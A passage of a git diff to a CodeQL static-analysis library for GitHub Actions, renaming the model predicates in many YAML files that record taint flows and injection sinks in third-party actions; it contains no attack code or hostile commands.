a/ql/lib/ext/ashley-taylor_read-json-property-action.model.yml b/ql/lib/ext/ashley-taylor_read-json-property-action.model.yml index 2a26d31feac7..aab329160ea1 100644 --- a/ql/lib/ext/ashley-taylor_read-json-property-action.model.yml +++ b/ql/lib/ext/ashley-taylor_read-json-property-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["ashley-taylor/read-json-property-action", "*", "input.json", "output.value", "taint", "manual"] diff --git a/ql/lib/ext/ashley-taylor_regex-property-action.model.yml b/ql/lib/ext/ashley-taylor_regex-property-action.model.yml index 82e81f558166..610d188f0655 100644 --- a/ql/lib/ext/ashley-taylor_regex-property-action.model.yml +++ b/ql/lib/ext/ashley-taylor_regex-property-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["ashley-taylor/regex-property-action", "*", "input.replacement", "output.value", "taint", "manual"] - ["ashley-taylor/regex-property-action", "*", "input.value", "output.value", "taint", "manual"] diff --git a/ql/lib/ext/aszc_change-string-case-action.model.yml b/ql/lib/ext/aszc_change-string-case-action.model.yml index 58554eb3f612..b571bded8ca8 100644 --- a/ql/lib/ext/aszc_change-string-case-action.model.yml +++ b/ql/lib/ext/aszc_change-string-case-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["aszc/change-string-case-action", "*", "input.string", "output.capitalized", "taint", "manual"] - ["aszc/change-string-case-action", "*", "input.replace-with", "output.uppercase", "taint", "manual"] diff --git a/ql/lib/ext/aws-actions_configure-aws-credentials.model.yml b/ql/lib/ext/aws-actions_configure-aws-credentials.model.yml index ca99210b4c2a..cd8f4f73e498 100644 --- a/ql/lib/ext/aws-actions_configure-aws-credentials.model.yml +++ b/ql/lib/ext/aws-actions_configure-aws-credentials.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["aws-actions/configure-aws-credentials", "*", "input.aws-access-key-id", "env.AWS_ACCESS_KEY_ID", "taint", "manual"] - ["aws-actions/configure-aws-credentials", "*", "input.aws-access-key-id", "secret.AWS_ACCESS_KEY_ID", "taint", "manual"] diff --git a/ql/lib/ext/axel-op_googlejavaformat-action.model.yml b/ql/lib/ext/axel-op_googlejavaformat-action.model.yml index 1563d95b0b14..6ebc3875e07b 100644 --- a/ql/lib/ext/axel-op_googlejavaformat-action.model.yml +++ b/ql/lib/ext/axel-op_googlejavaformat-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["axel-op/googlejavaformat-action", "*", "input.commitMessage", "command-injection", "manual"] - ["axel-op/googlejavaformat-action", "*", "input.commit-message", "command-injection", "manual"] diff --git a/ql/lib/ext/azure_powershell.model.yml b/ql/lib/ext/azure_powershell.model.yml index 2bb6000355d6..2b2dbd014b7f 100644 --- a/ql/lib/ext/azure_powershell.model.yml +++ b/ql/lib/ext/azure_powershell.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["azure/powershell", "*", "input.azPSVersion", "command-injection", "manual"] diff --git a/ql/lib/ext/bahmutov_npm-install.model.yml b/ql/lib/ext/bahmutov_npm-install.model.yml index b0c3419abe93..78b7eb1394c2 100644 --- a/ql/lib/ext/bahmutov_npm-install.model.yml +++ b/ql/lib/ext/bahmutov_npm-install.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["bahmutov/npm-install", "*", "input.install-command", "command-injection", "manual"] diff --git a/ql/lib/ext/blackducksoftware_github-action.model.yml b/ql/lib/ext/blackducksoftware_github-action.model.yml index cbe593690e44..0f146da2e0cb 100644 --- a/ql/lib/ext/blackducksoftware_github-action.model.yml +++ b/ql/lib/ext/blackducksoftware_github-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["blackducksoftware/github-action", "*", "input.args", "command-injection", "manual"] - ["blackducksoftware/github-action", "*", "input.blackduck.url", "command-injection", "manual"] diff --git a/ql/lib/ext/bobheadxi_deployments.model.yml b/ql/lib/ext/bobheadxi_deployments.model.yml index f29355d48827..483a3bf51727 100644 --- a/ql/lib/ext/bobheadxi_deployments.model.yml +++ b/ql/lib/ext/bobheadxi_deployments.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["bobheadxi/deployments", "*", "input.env", "output.env", "taint", "manual"] diff --git a/ql/lib/ext/bufbuild_buf-breaking-action.model.yml b/ql/lib/ext/bufbuild_buf-breaking-action.model.yml index 8463ed9577b4..e06e75f7a3bf 100644 --- a/ql/lib/ext/bufbuild_buf-breaking-action.model.yml +++ b/ql/lib/ext/bufbuild_buf-breaking-action.model.yml @@ -1,12 +1,12 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["bufbuild/buf-breaking-action", "*", "input.buf_token", "env.BUF_TOKEN", "taint", "manual"] - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["bufbuild/buf-breaking-action", "*", "input.input", "command-injection", "manual"] - ["bufbuild/buf-breaking-action", "*", "input.against", "command-injection", "manual"] diff --git a/ql/lib/ext/bufbuild_buf-lint-action.model.yml b/ql/lib/ext/bufbuild_buf-lint-action.model.yml index f20a877c3d28..d0a88ff31673 100644 --- a/ql/lib/ext/bufbuild_buf-lint-action.model.yml +++ b/ql/lib/ext/bufbuild_buf-lint-action.model.yml @@ -1,11 +1,11 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["bufbuild/buf-lint-action", "*", "input.buf_token", "env.BUF_TOKEN", "taint", "manual"] - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["bufbuild/buf-lint-action", "*", "input.input", "command-injection", "manual"] diff --git a/ql/lib/ext/bufbuild_buf-setup-action.model.yml b/ql/lib/ext/bufbuild_buf-setup-action.model.yml index e0fe96ff9152..a29f84a55b5e 100644 --- a/ql/lib/ext/bufbuild_buf-setup-action.model.yml +++ b/ql/lib/ext/bufbuild_buf-setup-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["bufbuild/buf-setup-action", "*", "input.buf_domain", "command-injection", "manual"] - ["bufbuild/buf-setup-action", "*", "input.buf_user", "command-injection", "manual"] diff --git a/ql/lib/ext/cachix_cachix-action.model.yml b/ql/lib/ext/cachix_cachix-action.model.yml index a7489b686882..0e11fe45b42c 100644 --- a/ql/lib/ext/cachix_cachix-action.model.yml +++ b/ql/lib/ext/cachix_cachix-action.model.yml @@ -1,12 +1,12 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["cachix/cachix-action", "*", "input.signingKey", "env.CACHIX_SIGNING_KEY", "taint", "manual"] - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cachix/cachix-action", "*", "input.installCommand", "command-injection", "manual"] - ["cachix/cachix-action", "*", "input.cachixBin", "command-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/changesets_action.model.yml b/ql/lib/ext/changesets_action.model.yml index c0a18c36465f..7e0970034a52 100644 --- a/ql/lib/ext/changesets_action.model.yml +++ b/ql/lib/ext/changesets_action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["changesets/action", "*", "input.publish", "command-injection", "manual"] - ["changesets/action", "*", "input.version", "command-injection", "manual"] diff --git a/ql/lib/ext/cloudflare_wrangler-action.model.yml b/ql/lib/ext/cloudflare_wrangler-action.model.yml index 79ed7a80437c..2f62f211da9c 100644 --- a/ql/lib/ext/cloudflare_wrangler-action.model.yml +++ b/ql/lib/ext/cloudflare_wrangler-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cloudflare/wrangler-action", "*", "input.preCommands", "command-injection", "manual"] - ["cloudflare/wrangler-action", "*", "input.postCommands", "command-injection", "manual"] diff --git a/ql/lib/ext/coursier_cache-action.model.yml b/ql/lib/ext/coursier_cache-action.model.yml index 550b5b854ed7..f94ad242321d 100644 --- a/ql/lib/ext/coursier_cache-action.model.yml +++ b/ql/lib/ext/coursier_cache-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["coursier/cache-action", "*", "input.path", "env.COURSIER_CACHE", "taint", "manual"] diff --git a/ql/lib/ext/crazy-max_ghaction-chocolatey.model.yml b/ql/lib/ext/crazy-max_ghaction-chocolatey.model.yml index bbe886112595..5872399881c5 100644 --- a/ql/lib/ext/crazy-max_ghaction-chocolatey.model.yml +++ b/ql/lib/ext/crazy-max_ghaction-chocolatey.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["crazy-max/ghaction-chocolatey", "*", "input.args", "command-injection", "manual"] diff --git a/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml b/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml index 83b3bc3520df..02c5dcd3ccaa 100644 --- a/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml +++ b/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["crazy-max/ghaction-import-gpg", "*", "input.fingerprint", "output.fingerprint", "taint", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/csexton_release-asset-action.model.yml b/ql/lib/ext/csexton_release-asset-action.model.yml index 3b0642fece44..45bf0c57355a 100644 --- a/ql/lib/ext/csexton_release-asset-action.model.yml +++ b/ql/lib/ext/csexton_release-asset-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["csexton/release-asset-action", "*", "input.release-url", "output.url", "taint", "manual"] diff --git a/ql/lib/ext/cycjimmy_semantic-release-action.model.yml b/ql/lib/ext/cycjimmy_semantic-release-action.model.yml index db55d3c6f3a8..4ac3492c41c3 100644 --- a/ql/lib/ext/cycjimmy_semantic-release-action.model.yml +++ b/ql/lib/ext/cycjimmy_semantic-release-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cycjimmy/semantic-release-action", "*", "input.semantic_version", "command-injection", "manual"] - ["cycjimmy/semantic-release-action", "*", "input.extra_plugins", "command-injection", "manual"] diff --git a/ql/lib/ext/cypress-io_github-action.model.yml b/ql/lib/ext/cypress-io_github-action.model.yml index a4539923b35f..a48da0cedfcc 100644 --- a/ql/lib/ext/cypress-io_github-action.model.yml +++ b/ql/lib/ext/cypress-io_github-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sourceModel + extensible: actionsSourceModel data: - ["cypress-io/github-action", "*", "env.GH_BRANCH", "branch", "manual"] diff --git a/ql/lib/ext/dailydotdev_action-devcard.model.yml b/ql/lib/ext/dailydotdev_action-devcard.model.yml index 462268636874..6ca7aa86c06d 100644 --- a/ql/lib/ext/dailydotdev_action-devcard.model.yml +++ b/ql/lib/ext/dailydotdev_action-devcard.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["dailydotdev/action-devcard", "*", "input.commit_branch", "sql-injection", "manual"] - ["dailydotdev/action-devcard", "*", "input.commit_filename", "sql-injection", "manual"] diff --git a/ql/lib/ext/danielpalme_reportgenerator-github-action.model.yml b/ql/lib/ext/danielpalme_reportgenerator-github-action.model.yml index afe3e82ca1f6..11f1f10980fe 100644 --- a/ql/lib/ext/danielpalme_reportgenerator-github-action.model.yml +++ b/ql/lib/ext/danielpalme_reportgenerator-github-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["danielpalme/reportgenerator-github-action", "*", "input.toolpath", "command-injection", "manual"] diff --git a/ql/lib/ext/daspn_private-actions-checkout.model.yml b/ql/lib/ext/daspn_private-actions-checkout.model.yml index 5b0a9dab38d7..9ed2cb7908b8 100644 --- a/ql/lib/ext/daspn_private-actions-checkout.model.yml +++ b/ql/lib/ext/daspn_private-actions-checkout.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["daspn/private-actions-checkout", "*", "input.actions_list", "command-injection", "manual"] - ["daspn/private-actions-checkout", "*", "input.checkout_base_path", "command-injection", "manual"] diff --git a/ql/lib/ext/dawidd6_action-ansible-playbook.model.yml b/ql/lib/ext/dawidd6_action-ansible-playbook.model.yml index 35bbd72f0a4d..7f279f37a45d 100644 --- a/ql/lib/ext/dawidd6_action-ansible-playbook.model.yml +++ b/ql/lib/ext/dawidd6_action-ansible-playbook.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["dawidd6/action-ansible-playbook", "*", "input.playbook", "command-injection", "manual"] - ["dawidd6/action-ansible-playbook", "*", "input.options", "command-injection", "manual"] diff --git a/ql/lib/ext/dawidd6_action-download-artifact.model.yml b/ql/lib/ext/dawidd6_action-download-artifact.model.yml index 472778d33b4b..68f434f4797a 100644 --- a/ql/lib/ext/dawidd6_action-download-artifact.model.yml +++ b/ql/lib/ext/dawidd6_action-download-artifact.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sourceModel + extensible: actionsSourceModel data: - ["dawidd6/action-download-artifact", "*", "output.artifacts", "artifact", "manual"] diff --git a/ql/lib/ext/delaguardo_setup-clojure.model.yml b/ql/lib/ext/delaguardo_setup-clojure.model.yml index 1647e5607304..890a47c79fca 100644 --- a/ql/lib/ext/delaguardo_setup-clojure.model.yml +++ b/ql/lib/ext/delaguardo_setup-clojure.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["delaguardo/setup-clojure", "*", "input.boot", "env.BOOT_VERSION", "taint", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/determinatesystems_magic-nix-cache-action.model.yml b/ql/lib/ext/determinatesystems_magic-nix-cache-action.model.yml index bbdad8287dd3..aff5c3303165 100644 --- a/ql/lib/ext/determinatesystems_magic-nix-cache-action.model.yml +++ b/ql/lib/ext/determinatesystems_magic-nix-cache-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["determinatesystems/magic-nix-cache-action", "*", "input.source-url", "command-injection", "manual"] - ["determinatesystems/magic-nix-cache-action", "*", "input.source-tag", "command-injection", "manual"] diff --git a/ql/lib/ext/docker-practice_actions-setup-docker.model.yml b/ql/lib/ext/docker-practice_actions-setup-docker.model.yml index f3ac66006d99..8f5e22fa2d96 100644 --- a/ql/lib/ext/docker-practice_actions-setup-docker.model.yml +++ b/ql/lib/ext/docker-practice_actions-setup-docker.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["docker-practice/actions-setup-docker", "*", "input.docker_version", "command-injection", "manual"] - ["docker-practice/actions-setup-docker", "*", "input.docker_channel", "command-injection", "manual"] diff --git a/ql/lib/ext/docker_build-push-action.model.yml b/ql/lib/ext/docker_build-push-action.model.yml index 9189245e2289..ff0131da99e3 100644 --- a/ql/lib/ext/docker_build-push-action.model.yml +++ b/ql/lib/ext/docker_build-push-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["docker/build-push-action", "*", "input.context", "code-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/endbug_latest-tag.model.yml b/ql/lib/ext/endbug_latest-tag.model.yml index bd64fc374236..1d82fb8f836f 100644 --- a/ql/lib/ext/endbug_latest-tag.model.yml +++ b/ql/lib/ext/endbug_latest-tag.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["endbug/latest-tag", "*", "input.ref", "command-injection", "manual"] - ["endbug/latest-tag", "*", "input.tag-name", "command-injection", "manual"] diff --git a/ql/lib/ext/expo_expo-github-action.model.yml b/ql/lib/ext/expo_expo-github-action.model.yml index 9a20279e1103..1e4cc21dd130 100644 --- a/ql/lib/ext/expo_expo-github-action.model.yml +++ b/ql/lib/ext/expo_expo-github-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["expo/expo-github-action", "*", "input.command", "command-injection", "manual"] - ["expo/expo-github-action", "*", "input.packager", "command-injection", "manual"] diff --git a/ql/lib/ext/firebaseextended_action-hosting-deploy.model.yml b/ql/lib/ext/firebaseextended_action-hosting-deploy.model.yml index 8d06bc8a5121..ba729868a040 100644 --- a/ql/lib/ext/firebaseextended_action-hosting-deploy.model.yml +++ b/ql/lib/ext/firebaseextended_action-hosting-deploy.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["firebaseextended/action-hosting-deploy", "*", "input.firebaseToolsVersion", "command-injection", "manual"] diff --git a/ql/lib/ext/frabert_replace-string-action.model.yml b/ql/lib/ext/frabert_replace-string-action.model.yml index 9d066ac23ecd..504f0693977d 100644 --- a/ql/lib/ext/frabert_replace-string-action.model.yml +++ b/ql/lib/ext/frabert_replace-string-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["frabert/replace-string-action", "*", "input.string", "output.replaced", "taint", "manual"] - ["frabert/replace-string-action", "*", "input.replace-with", "output.replaced", "taint", "manual"] diff --git a/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml b/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml index 71d837742315..48267b6d0820 100644 --- a/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml +++ b/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sourceModel + extensible: actionsSourceModel data: - ["franzdiebold/github-env-vars-action", "*", "output.CI_PR_DESCRIPTION", "text", "manual"] - ["franzdiebold/github-env-vars-action", "*", "output.CI_PR_TITLE", "title", "manual"] diff --git a/ql/lib/ext/gabrielbb_xvfb-action.model.yml b/ql/lib/ext/gabrielbb_xvfb-action.model.yml index 563da9d4c0f4..26eea1d2341b 100644 --- a/ql/lib/ext/gabrielbb_xvfb-action.model.yml +++ b/ql/lib/ext/gabrielbb_xvfb-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["gabrielbb/xvfb-action", "*", "input.run", "command-injection", "manual"] - ["gabrielbb/xvfb-action", "*", "input.options", "command-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/game-ci_unity-builder.model.yml b/ql/lib/ext/game-ci_unity-builder.model.yml index 5194ce500fb1..7993d827fa6f 100644 --- a/ql/lib/ext/game-ci_unity-builder.model.yml +++ b/ql/lib/ext/game-ci_unity-builder.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["game-ci/unity-builder", "*", "input.cacheKey", "command-injection", "manual"] - ["game-ci/unity-builder", "*", "input.unityHubVersionOnMac", "command-injection", "manual"] diff --git a/ql/lib/ext/game-ci_unity-test-runner.model.yml b/ql/lib/ext/game-ci_unity-test-runner.model.yml index 8c2f32627d90..de48ea5a7092 100644 --- a/ql/lib/ext/game-ci_unity-test-runner.model.yml +++ b/ql/lib/ext/game-ci_unity-test-runner.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["game-ci/unity-test-runner", "*", "input.artifactsPath", "output.artifactsPath", "taint", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/gautamkrishnar_blog-post-workflow.model.yml b/ql/lib/ext/gautamkrishnar_blog-post-workflow.model.yml index f74ae81a52c8..36a9b24f0891 100644 --- a/ql/lib/ext/gautamkrishnar_blog-post-workflow.model.yml +++ b/ql/lib/ext/gautamkrishnar_blog-post-workflow.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["gautamkrishnar/blog-post-workflow", "*", "input.item_exec", "code-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/actions_actions-runner-controller.model.yml b/ql/lib/ext/generated/composite-actions/actions_actions-runner-controller.model.yml index 877543ea8e4f..f04f8dda6c8e 100644 --- a/ql/lib/ext/generated/composite-actions/actions_actions-runner-controller.model.yml +++ b/ql/lib/ext/generated/composite-actions/actions_actions-runner-controller.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["actions/actions-runner-controller", "*", "input.image-tag", "code-injection", "generated"] - ["actions/actions-runner-controller", "*", "input.image-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/adap_flower.model.yml b/ql/lib/ext/generated/composite-actions/adap_flower.model.yml index 1c9d4a7f6d98..a37d6452d504 100644 --- a/ql/lib/ext/generated/composite-actions/adap_flower.model.yml +++ b/ql/lib/ext/generated/composite-actions/adap_flower.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["adap/flower", "*", "input.poetry-version", "code-injection", "generated"] - ["adap/flower", "*", "input.setuptools-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/agoric_agoric-sdk.model.yml b/ql/lib/ext/generated/composite-actions/agoric_agoric-sdk.model.yml index a9d657247359..352eb51996af 100644 --- a/ql/lib/ext/generated/composite-actions/agoric_agoric-sdk.model.yml +++ b/ql/lib/ext/generated/composite-actions/agoric_agoric-sdk.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["agoric/agoric-sdk", "*", "input.xsnap-random-init", "code-injection", "generated"] - ["agoric/agoric-sdk", "*", "input.path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/airbnb_lottie-ios.model.yml b/ql/lib/ext/generated/composite-actions/airbnb_lottie-ios.model.yml index d40014b9a129..44f34c11cb3d 100644 --- a/ql/lib/ext/generated/composite-actions/airbnb_lottie-ios.model.yml +++ b/ql/lib/ext/generated/composite-actions/airbnb_lottie-ios.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["airbnb/lottie-ios", "*", "input.xcode", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/airbytehq_airbyte.model.yml b/ql/lib/ext/generated/composite-actions/airbytehq_airbyte.model.yml index 7452ddc21876..3fd2e46296ab 100644 --- a/ql/lib/ext/generated/composite-actions/airbytehq_airbyte.model.yml +++ b/ql/lib/ext/generated/composite-actions/airbytehq_airbyte.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["airbytehq/airbyte", "*", "input.options", "code-injection", "generated"] - ["airbytehq/airbyte", "*", "input.subcommand", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/amazon-ion_ion-java.model.yml b/ql/lib/ext/generated/composite-actions/amazon-ion_ion-java.model.yml index a91d2c7b0e57..881374b6c903 100644 --- a/ql/lib/ext/generated/composite-actions/amazon-ion_ion-java.model.yml +++ b/ql/lib/ext/generated/composite-actions/amazon-ion_ion-java.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["amazon-ion/ion-java", "*", "input.project_version", "code-injection", "generated"] - ["amazon-ion/ion-java", "*", "input.repo", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/anchore_grype.model.yml b/ql/lib/ext/generated/composite-actions/anchore_grype.model.yml index 95b5ba13ad17..6d77c866dc25 100644 --- a/ql/lib/ext/generated/composite-actions/anchore_grype.model.yml +++ b/ql/lib/ext/generated/composite-actions/anchore_grype.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["anchore/grype", "*", "input.bootstrap-apt-packages", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/anchore_syft.model.yml b/ql/lib/ext/generated/composite-actions/anchore_syft.model.yml index 7157e1bea48a..0b27c5845844 100644 --- a/ql/lib/ext/generated/composite-actions/anchore_syft.model.yml +++ b/ql/lib/ext/generated/composite-actions/anchore_syft.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["anchore/syft", "*", "input.bootstrap-apt-packages", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/angular_dev-infra.model.yml b/ql/lib/ext/generated/composite-actions/angular_dev-infra.model.yml index a3f43d524b4a..911d3e571558 100644 --- a/ql/lib/ext/generated/composite-actions/angular_dev-infra.model.yml +++ b/ql/lib/ext/generated/composite-actions/angular_dev-infra.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["angular/dev-infra", "*", "input.firebase-public-dir", "code-injection", "generated"] - ["angular/dev-infra", "*", "input.workflow-artifact-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ansible_ansible-lint.model.yml b/ql/lib/ext/generated/composite-actions/ansible_ansible-lint.model.yml index 6e0d980943a1..1ac668cf55ac 100644 --- a/ql/lib/ext/generated/composite-actions/ansible_ansible-lint.model.yml +++ b/ql/lib/ext/generated/composite-actions/ansible_ansible-lint.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ansible/ansible-lint", "*", "input.args", "code-injection", "generated"] - ["ansible/ansible-lint", "*", "input.working_directory", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ansible_awx.model.yml b/ql/lib/ext/generated/composite-actions/ansible_awx.model.yml index ef682ff4fffe..5cf121dcef26 100644 --- a/ql/lib/ext/generated/composite-actions/ansible_awx.model.yml +++ b/ql/lib/ext/generated/composite-actions/ansible_awx.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ansible/awx", "*", "input.log-filename", "code-injection", "generated"] - ["ansible/awx", "*", "input.github-token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_arrow-datafusion.model.yml b/ql/lib/ext/generated/composite-actions/apache_arrow-datafusion.model.yml index 7ce84599d17d..d946204e9b96 100644 --- a/ql/lib/ext/generated/composite-actions/apache_arrow-datafusion.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_arrow-datafusion.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["apache/arrow-datafusion", "*", "input.rust-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_arrow-rs.model.yml b/ql/lib/ext/generated/composite-actions/apache_arrow-rs.model.yml index 47f1c83016f5..c6839a7b004e 100644 --- a/ql/lib/ext/generated/composite-actions/apache_arrow-rs.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_arrow-rs.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["apache/arrow-rs", "*", "input.target", "code-injection", "generated"] - ["apache/arrow-rs", "*", "input.rust-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_arrow.model.yml 